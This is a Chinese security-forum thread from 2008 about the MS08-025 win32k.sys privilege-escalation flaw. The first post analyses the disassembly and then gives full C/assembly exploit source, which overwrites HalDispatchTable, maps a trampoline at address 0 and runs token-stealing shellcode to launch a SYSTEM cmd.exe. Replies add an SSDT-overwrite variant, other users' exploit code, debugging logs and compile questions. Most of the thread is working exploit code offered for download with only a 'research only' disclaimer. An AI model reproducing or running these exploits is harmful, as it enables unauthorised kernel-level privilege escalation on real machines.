[原创]MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

发表于: 2008-4-14 19:17 14779

[原创]MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

vessial(xee) 活跃值

2008-4-14 19:17

14779

问题出在ProbeForWrite在处理指定的地址可写时，传入指定的长度为0时就不进行判断，就可以造成指定的地址可写，这样我们就可以写任意的内核空间了，

.text:BF850BB7                push 14h
.text:BF850BB9                push offset stru_BF9940D0
.text:BF850BBE                call __SEH_prolog
.text:BF850BC3                xor    edx, edx
.text:BF850BC5                mov    [ebp+ms_exc.disabled], edx
.text:BF850BC8                mov    eax, [ebp+var_20]
.text:BF850BCB                mov    ecx, 7FFFFFFFh
.text:BF850BD0                and    eax, ecx
.text:BF850BD2                mov    esi, [ebp+arg_18]
.text:BF850BD5                shl    esi, 1Fh
.text:BF850BD8                or    eax, esi
.text:BF850BDA                mov    [ebp+var_20], eax
.text:BF850BDD                mov    esi, eax
.text:BF850BDF                xor    esi, [ebp+arg_8]
.text:BF850BE2                and    esi, ecx
.text:BF850BE4                xor    eax, esi
.text:BF850BE6                mov    [ebp+var_20], eax
.text:BF850BE9                cmp    [ebp+arg_18], edx
.text:BF850BEC                jnz    short loc_BF850BFA
.text:BF850BEE                lea    esi, [eax+eax] //当eax=0x80000000时，esi就会整形溢出为0，这样就触发了可写内核空间
.text:BF850BF1                xor    esi, eax
.text:BF850BF3                and    esi, ecx
.text:BF850BF5                xor    eax, esi
.text:BF850BF7                mov    [ebp+var_20], eax
.text:BF850BFA
.text:BF850BFA loc_BF850BFA:                         ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35 j
.text:BF850BFA                mov    [ebp+var_24], edx
.text:BF850BFD                mov    esi, [ebp+Address]
.text:BF850C00                mov    [ebp+var_1C], esi
.text:BF850C03                xor    ebx, ebx
.text:BF850C05                inc    ebx
.text:BF850C06                push ebx          ; Alignment
.text:BF850C07                and    eax, ecx
.text:BF850C09                push eax          ; Length //length=0
.text:BF850C0A                push esi          ; Address
.text:BF850C0B                call ds:__imp__ProbeForWrite@12 ; ProbeForWrite(x,x,x)
.text:BF850C11                or    [ebp+ms_exc.disabled], 0FFFFFFFFh
.text:BF850C15                mov    eax, [ebp+arg_14]
.text:BF850C18                add    eax, 6
.text:BF850C1B                and    eax, 1Fh
.text:BF850C1E                push [ebp+arg_10]
.text:BF850C21                lea    ecx, [ebp+var_24]
.text:BF850C24                push ecx
.text:BF850C25                push [ebp+arg_8]
.text:BF850C28                push [ebp+arg_4]
.text:BF850C2B                push [ebp+arg_0]
.text:BF850C2E                mov    ecx, _gpsi
.text:BF850C34                call dword ptr [ecx+eax*4+8]
.text:BF850C38                mov    edi, eax
.text:BF850C3A                test edi, edi
.text:BF850C3C                jz    loc_BF850B94
.text:BF850C42
.text:BF850C42 loc_BF850C42:                         ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)-20 j
.text:BF850C42                                        ; NtUserfnOUTSTRING(x,x,x,x,x,x,x)-A j
.text:BF850C42                mov    eax, edi
.text:BF850C44                call __SEH_epilog
.text:BF850C49                retn 1Ch
.text:BF850C49 _NtUserfnOUTSTRING@28 endp
.text:BF850C49
.text:BF850C4C ; ---------------------------------------------------------

这里是通过覆盖了内核中的 HalDispatchTable表来执行shellcode的

下面是我修改ruben的exploit

// ms08-25-exploit #1
// This exploit takes advantage of one of the vulnerabilities
// patched in the Microsoft Security bulletin MS08-25
// http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx
// ---------------------------------------
// For research purposes ONLY.
// ---------------------------------------
// Ruben Santamarta
// www.reversemode.com
// http://hi.baidu.com/vessial changed the shellcode

#include "stdafx.h"

typedef enum _KPROFILE_SOURCE {

ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
ProfileTotalNonissues,
ProfileDcacheMisses,
ProfileIcacheMisses,
ProfileCacheMisses,
ProfileBranchMispredictions,
ProfileStoreInstructions,
ProfileFpInstructions,
ProfileIntegerInstructions,
Profile2Issue,
Profile3Issue,
Profile4Issue,
ProfileSpecialInstructions,
ProfileTotalCycles,
ProfileIcacheIssues,
ProfileDcacheAccesses,
ProfileMemoryBarrierCycles,
ProfileLoadLinkedIssues,
ProfileMaximum

} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,
                                       PULONG       Interval );

typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE             ProcessHandle,
                                    IN OUT PVOID          *BaseAddress,
                                    IN ULONG             ZeroBits,
                                    IN OUT PULONG          RegionSize,
                                    IN ULONG             AllocationType,
                                    IN ULONG             Protect );

OSVERSIONINFOEX OsVersionInfo;

_declspec(naked) int ShellCode()
{

   if ( OsVersionInfo.dwMinorVersion == 1 ) {

   __asm {

            nop
            nop
            nop
            nop
            nop
            nop

            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]

            mov esi,[eax+0x220]
            mov eax,esi

searchXp:

            mov eax,[eax+0x88]
            sub eax,0x88
            mov edx,[eax+0x84]
            cmp edx,0x4 // Find System Process
            jne searchXp

            mov eax,[eax+0xc8] // 获取system进程的token
            mov [esi+0xc8],eax // 修改当前进程的token

            ret 8

   }
}
if ( OsVersionInfo.dwMinorVersion == 2 ) {

   __asm {

         nop
            nop
            nop
            nop
            nop
            nop

            mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
            Mov eax,[eax]

            mov esi,[eax+0x220]
            mov eax,esi

search2003:

            mov eax,[eax+0x98]
            sub eax,0x98
            mov edx,[eax+0x94]
            cmp edx,0x4 // Find System Process
            jne search2003

            mov eax,[eax+0xd8] // 获取system进程的token
            mov [esi+0xd8],eax // 修改当前进程的token
            ret 8

   }
}


}
_declspec(naked) ULONG __stdcall NtUserMessageCall
(
IN HWND arg1,
IN ULONG_PTR arg2,
IN ULONG_PTR arg3,
IN ULONG_PTR arg4,
IN ULONG_PTR arg5,
IN ULONG_PTR arg6,
IN ULONG_PTR arg7
)
{
__asm
{
   mov eax, 000011cch
   mov edx, 7ffe0300h
   call dword ptr [edx]
   retn 1Ch
}
}

void InitTrampoline()
{

PNTALLOCATE NtAllocateVirtualMemory;
LPVOID    addr = (LPVOID)3;
DWORD    dwShellSize=0x1000;
unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0
                           "\xc3";                                        // retn

NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

if( !NtAllocateVirtualMemory )
   exit(0);

NtAllocateVirtualMemory( (HANDLE)-1,
                           &addr,
                           0,
                           &dwShellSize,
                           MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                           PAGE_EXECUTE_READWRITE );

if( (ULONG_PTR)addr )
{
   printf("\n[++] Error Allocating memory\n");
   exit(0);
}


*(ULONG_PTR*)(trampoline+1)=(ULONG_PTR)ShellCode;//push &shellcode
               // retn
                                                                                          这样就可以直接执行shellcode了
memcpy(NULL,trampoline,sizeof(trampoline)-1);    指跳转指令写入0x0地址，cool吧，你有做过吗？:)
}
int Callback_Overview()
{
printf("\n");
printf("===================================================================== \n");
printf("\t\tMicrosoft Windows XP SP2 - MS08-025 -    \n");
printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n");
printf("===================================================================== \n");
printf("+ References:\n");
printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n");
printf(" http://www.reversemode.com\n\n");
printf(" http://hi.baidu.com/vessial\n\n");
printf(" vessial just changed the shellcode can get the system token\n");
return 1;
}

int main(int argc, char **argv)
{


PNTQUERYINTERVAL NtQueryIntervalProfile;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;

ULONG_PTR HalDispatchTable;
ULONG_PTR BaseNt=0;
ULONG_PTR result;

HMODULE    hKernel;
char    szNtos[MAX_PATH] = {0};

STARTUPINFOA             stStartup;
PROCESS_INFORMATION          pi;

Callback_Overview();

LoadLibrary("user32.dll");

if( GetDriverInfoByName("krnl",szNtos,&BaseNt) )
{
   printf("[+] %s loaded at \t [ 0x%p ]\n",szNtos,BaseNt);

}
else
{
   printf("[!!] Kernel not found :?\n");
   return FALSE;
}

if( strstr(szNtos,"krnlpa") )
{
   hKernel = LoadLibraryExA("ntkrnlpa.exe",0,1);
}
else
{
   hKernel = LoadLibraryExA("ntoskrnl.exe",0,1);
}

HalDispatchTable = (ULONG_PTR)GetProcAddress(hKernel, "HalDispatchTable");

if( !HalDispatchTable )
{
   printf("[!!] HalDispatchTable not found\n");
   return FALSE;
}



RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

if ( OsVersionInfo.dwMajorVersion != 5 ) {

   printf( "Not NT5 system\n" );
   ExitProcess( 0 );
}
//Get Operatiny System Version
HalDispatchTable -= ( ULONG_PTR )hKernel;
HalDispatchTable += BaseNt;

printf("[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable);

printf("[+] NtQueryIntervalProfile ");

NtQueryIntervalProfile = ( PNTQUERYINTERVAL )
                        GetProcAddress( GetModuleHandle("ntdll.dll")
                                       ,"NtQueryIntervalProfile");

if( !NtQueryIntervalProfile )
{
   printf("[!!] Unable to resolve NtQueryIntervalProfile\n");
   return FALSE;
}
printf( "\t\t\t [ 0x%p ]\n",NtQueryIntervalProfile );

InitTrampoline();

NtUserMessageCall( GetDesktopWindow(),
                     0xD,
                     0x80000000,
                     HalDispatchTable+sizeof(WORD)+sizeof(ULONG_PTR),
                     0x0,
                     0x0,
                     0x0);
NtUserMessageCall( GetDesktopWindow(),
                     0xD,
                     0x80000000,
                     HalDispatchTable+sizeof(ULONG_PTR),
                     0x0,
                     0x0,
                     0x0);
printf("\n[+] Executing Shellcode...\n");

NtQueryIntervalProfile(stProfile,&result);//这里的作用是为了call 0x0,真是经典
GetStartupInfo( &stStartup );

CreateProcess( NULL,
   "cmd.exe",
   NULL,
   NULL,
   TRUE,
   NULL,
   NULL,
   NULL,
   &stStartup,
   &pi ); //此时创建的cmd.exe是SYSTEM权限

printf("[+] Exiting...\n");

return TRUE;
}

  在XP系统下测试成功:)
  2003还没有试过，大家试试：）

技术研究，请勿作非法用途

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

ms08-25-exploit.rar （39.45kb，296次下载）

收藏・12

免费・7

支持

最新回复 (31) 1 2 ▶
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 2 楼 PS: 学习了一下内核漏洞利用感谢whitecell的大牛们的精典exploit 2008-4-14 19:33 0
NWMonster 雪币： 134 活跃值： (84) 能力值： ( LV5，RANK：60 ) 在线值：发帖 26 回帖 457 粉丝 8 关注私信	NWMonster 1 3 楼很强，谢谢，支持一个 2008-4-14 20:29 0
bwin 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 183 粉丝 0 关注私信	bwin 4 楼学习了一下内核漏洞利用 2008-4-14 21:00 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼 SSDT 很多exploit用的覆盖SSDT执行shell ，但实际情况SSDT 有内存保护不可写不知道楼主是否尝试过改写SSDT 2008-4-14 21:08 0
amour 雪币： 250 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 102 粉丝 0 关注私信	amour 6 楼学习收藏之!! 2008-4-14 22:11 0
amour 雪币： 250 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 102 粉丝 0 关注私信	amour 7 楼 server 2003 sp1下提权失败 2008-4-14 22:35 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 8 楼看见上帖，大家提了一下，我以前也没有试过，于是现在自已尝试一下，没想到还真成功了，呵呵，谢谢大家的提醒：） MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit 另一种利用方式，通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行 #include <stdio.h> #include <windows.h> typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI PNTALLOCATE)(HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS (NTAPI ZWVDMCONTROL)(ULONG, PVOID); void ErrorQuit(char msg) { printf("%s:%x\n", msg, GetLastError()); ExitProcess(0); } ZWVDMCONTROL ZwVdmControl=NULL; OSVERSIONINFOEX OsVersionInfo; _declspec(naked) int ShellCode() { if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 } } if ( OsVersionInfo.dwMinorVersion == 2 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi search2003: mov eax,[eax+0x98] sub eax,0x98 mov edx,[eax+0x94] cmp edx,0x4 // Find System Process jne search2003 mov eax,[eax+0xd8] // 获取system进程的token mov [esi+0xd8],eax // 修改当前进程的token ret 8 } } } void InitTrampoline() { PNTALLOCATE NtAllocateVirtualMemory; LPVOID addr = (LPVOID)3; DWORD dwShellSize=0x1000; unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0 "\xc3"; // retn NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory"); if( !NtAllocateVirtualMemory ) exit(0); NtAllocateVirtualMemory( (HANDLE)-1, &addr, 0, &dwShellSize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); if( (PULONG)addr ) { printf("\n[++] Error Allocating memory\n"); exit(0); } (PULONG)(trampoline+1)=(PULONG)ShellCode; memcpy(NULL,trampoline,sizeof(trampoline)-1); } int Callback_Overview() { printf("\n"); printf("===================================================================== \n"); printf("\t\tMicrosoft Windows XP SP2 - MS08-025 - \n"); printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n"); printf("===================================================================== \n"); printf("+ References:\n"); printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n"); printf(" http://hi.baidu.com/vessial\n\n"); return 1; } void GetFunction() { HANDLE hNtdll,hNtos; hNtdll = LoadLibrary("ntdll.dll"); if(hNtdll == NULL) ErrorQuit("LoadLibrary failed.\n"); ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl"); if(ZwVdmControl == NULL) ErrorQuit("GetProcAddress failed.\n"); FreeLibrary(hNtdll); } int main(int argc, char *argv) { //PULONG PntVdmControl=0x805F0DB0; PULONG PntVdmControl=0x80502460; //通过(PULONG)(KeServiceDescriptorTalbe)+0x10c4获得 STARTUPINFOA stStartup; PROCESS_INFORMATION pi; Callback_Overview(); GetFunction(); RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); } //Get Operatiny System Version InitTrampoline(); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表，覆盖后结果为0x0 printf("\n[+] Executing Shellcode...\n"); ZwVdmControl(0, NULL);//这里就是call 0x0了，跳转执行我们的shellcode,哈哈：） GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); //此时创建的cmd.exe是SYSTEM权限 printf("[+] Exiting...\n"); return TRUE; } 我在XP测试成功，下面的第一个cmd是SYSTEM权限，这是我们提权后的，一个cmd是test权限上传的附件： ms08025.JPG （86.35kb，1028次下载） 2008-4-15 00:31 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 9 楼我的是windows 2003 SP2,没有作SP1的系统判断你可以先看一下SP1的EPROCESS的数据结构和偏移是否正确，再改一下shellcode，应该没有问题。 2008-4-15 00:35 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 10 楼我这里一写SSDT就蓝,把SSDT写保护去掉能执行shell 不过ret 8返回时又出错了我是申请块内存地址为0x8 此地址开始放入shell 然后用0x8 覆盖SSDT里的函数这样就不行? #include <stdio.h> #include <windows.h> #include <stdlib.h> #include "setshell.h" #define NTSTATUS int typedef NTSTATUS (NTAPI ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID , ULONG, PULONG, ULONG, ULONG); ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory; int main(int argc,char argv[]) { PVOID ZwVdmControl = NULL; DWORD HookAddress =0x8725f868;// 0x80504d70;//0x80502460;//0x805faad2; //ntvdmcontrol //这里要改掉 DWORD HookAddress1 = 0x8725f866;// 就是HookAddress-2 //相应的也该掉 PVOID ShellCodeMemory = (PVOID)0x8; //Shellcode的地址 DWORD MemorySize = 0x1000; PROCESS_INFORMATION pi; STARTUPINFOA stStartup; HINSTANCE hNtdll; hNtdll = LoadLibrary("ntdll.dll"); ZwAllocateVirtualMemory =(ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory"); ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" ); printf( " Create execute environment ... " ); ZwAllocateVirtualMemory( (HANDLE)-1, &ShellCodeMemory, 0, &MemorySize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); printf( "Ok!\n" ); memset( ShellCodeMemory, 0x90, MemorySize ); SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x8) ); CHAR b[1000]; DWORD saddr=0x8; ::SendMessageW(::GetDesktopWindow() , WM_SETTEXT , 1 , (ULONG)&saddr ); ::SendMessageW(::GetDesktopWindow() , WM_GETTEXT , 0x80000000 ,HookAddress); saddr=0; ::SendMessageW(::GetDesktopWindow() , WM_SETTEXT , 1 , (ULONG)&saddr ); ::SendMessageW(::GetDesktopWindow() , WM_GETTEXT , 0x80000000 , HookAddress1); _asm { xor ecx,ecx push ecx push ecx mov eax, ZwVdmControl call eax } GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); return 0; } //setshell.h VOID SetShellCodeToMemory( PVOID ShellCodeMemory ) { OSVERSIONINFOEX OsVersionInfo; RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); return; } if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { call CopyXpShellCode nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 CopyXpShellCode: pop esi mov edi, ShellCodeMemory lea ecx, CopyXpShellCode sub ecx, esi cld rep movsb } } } 2008-4-15 03:27 0
火影雪币： 332 活跃值： (30) 能力值： ( LV12，RANK：460 ) 在线值：发帖 24 回帖 141 粉丝 1 关注私信	火影 11 11 楼学习之 2008-4-15 08:47 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 12 楼那你得用softice跟一下，看是在哪儿出的错。 2008-4-15 09:02 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 13 楼用shellcode创建个调用门不就可以随时进ring0了么~ 2008-4-15 12:03 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 14 楼我在虚拟机调试我这里的xp不能写SSDT 先去掉内存写保护才可以为什么有的机器可以写SSDT 有的却不可以去掉写保护后 shell执行完返回出错了， kd> 00000039 8986c8000000 mov dword ptr [esi+0C8h],eax 0000003f c20800 ret 8 00000042 90 nop 00000043 90 nop 00000044 90 nop 00000045 90 nop 00000046 90 nop 00000047 90 nop kd> ba e1 3f kd> g Breakpoint 2 hit 0000003f c20800 ret 8 kd> t //执行完ret 8 返回 nt!KiFastCallEntry+0xf8: 8053d808 8be5 mov esp,ebp kd> g //这里就走不了了 Access violation - code c0000005 (!!! second chance !!!) 00007d70 ?? ??? 加调用门？老v把代码放出来大家学习啊 2008-4-15 12:39 0
NIXIANG 雪币： 200 能力值： (RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	NIXIANG 15 楼学习。。。。 2008-4-15 15:07 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 56 关注私信	combojiang 26 16 楼学习。 2008-4-15 20:13 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 17 楼好像内存比较小的时候不会开启SSDT的写保护,不知道14楼说的是不是因为这个 2008-4-16 16:27 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 18 楼樓主你那個exploit如何compile呀? 我用vc 6.0 要加上什么.h檔? #include "stdafx.h" 可否不要呀? 2008-4-16 18:26 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 19 楼那个头文件是建工程的时候自己生成的，可以不要。你对VC还不熟就来玩这种玩意... 2008-4-16 18:33 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 20 楼為何我一run你的程式就立即restar 我是用vc6.0 compile xp sp2 繁中 2008-4-16 18:35 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 21 楼那請問樓主那個程式應如何compile 應加上什么頭檔? 2008-4-16 18:38 0
nbgj 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 22 粉丝 0 关注私信	nbgj 22 楼有点弄不明白,不过顶了 2008-4-17 09:18 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 23 楼如何compile呀? http://tieba.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=3662504648&z=357690591&pn=0&rn=50&lm=0&word=c%2B%2B#3662504648 2008-4-17 22:53 0
渗透雪币： 119 活跃值： (313) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 111 粉丝 0 关注私信	渗透 24 楼另一种形态！就如同峨眉与少林 2008-4-18 14:29 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 25 楼 #include <stdio.h> #include <windows.h> typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI PNTALLOCATE)(HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS (NTAPI ZWVDMCONTROL)(ULONG, PVOID); void ErrorQuit(char msg) { printf("%s:%x\n", msg, GetLastError()); ExitProcess(0); } ZWVDMCONTROL ZwVdmControl=NULL; OSVERSIONINFOEX OsVersionInfo; _declspec(naked) int ShellCode() { if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 } } if ( OsVersionInfo.dwMinorVersion == 2 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi search2003: mov eax,[eax+0x98] sub eax,0x98 mov edx,[eax+0x94] cmp edx,0x4 // Find System Process jne search2003 mov eax,[eax+0xd8] // 获取system进程的token mov [esi+0xd8],eax // 修改当前进程的token ret 8 } } } void InitTrampoline() { PNTALLOCATE NtAllocateVirtualMemory; LPVOID addr = (LPVOID)3; DWORD dwShellSize=0x1000; unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0 "\xc3"; // retn NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory"); if( !NtAllocateVirtualMemory ) exit(0); NtAllocateVirtualMemory( (HANDLE)-1, &addr, 0, &dwShellSize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); if( (PULONG)addr ) { printf("\n[++] Error Allocating memory\n"); exit(0); } (PULONG)(trampoline+1)=(PULONG)ShellCode; memcpy(NULL,trampoline,sizeof(trampoline)-1); } int Callback_Overview() { printf("\n"); printf("===================================================================== \n"); printf("\t\tMicrosoft Windows XP SP2 - MS08-025 - \n"); printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n"); printf("===================================================================== \n"); printf("+ References:\n"); printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n"); printf(" http://hi.baidu.com/vessial\n\n"); return 1; } void GetFunction() { HANDLE hNtdll,hNtos; hNtdll = LoadLibrary("ntdll.dll"); if(hNtdll == NULL) ErrorQuit("LoadLibrary failed.\n"); ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl"); if(ZwVdmControl == NULL) ErrorQuit("GetProcAddress failed.\n"); FreeLibrary(hNtdll); } int main(int argc, char *argv) { //PULONG PntVdmControl=0x805F0DB0; PULONG PntVdmControl=0x80502460; //通过(PULONG)(KeServiceDescriptorTalbe)+0x10c4获得 STARTUPINFOA stStartup; PROCESS_INFORMATION pi; Callback_Overview(); GetFunction(); RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); } //Get Operatiny System Version InitTrampoline(); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表，覆盖后结果为0x0 printf("\n[+] Executing Shellcode...\n"); ZwVdmControl(0, NULL);//这里就是call 0x0了，跳转执行我们的shellcode,哈哈：） GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, π ); //此时创建的cmd.exe是SYSTEM权限 printf("[+] Exiting...\n"); return TRUE; } 我把以上程式中的 CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, π ); //此时创建的cmd.exe是SYSTEM权限改成自已的程式即把 cmd.exe改成a.exe為何這個a.exe不是SYSTEM權限還是一般用戶權限呢? 2008-4-21 23:45 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

vessial(xee)

发帖

126

回帖

480

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (31) 1 2 ▶
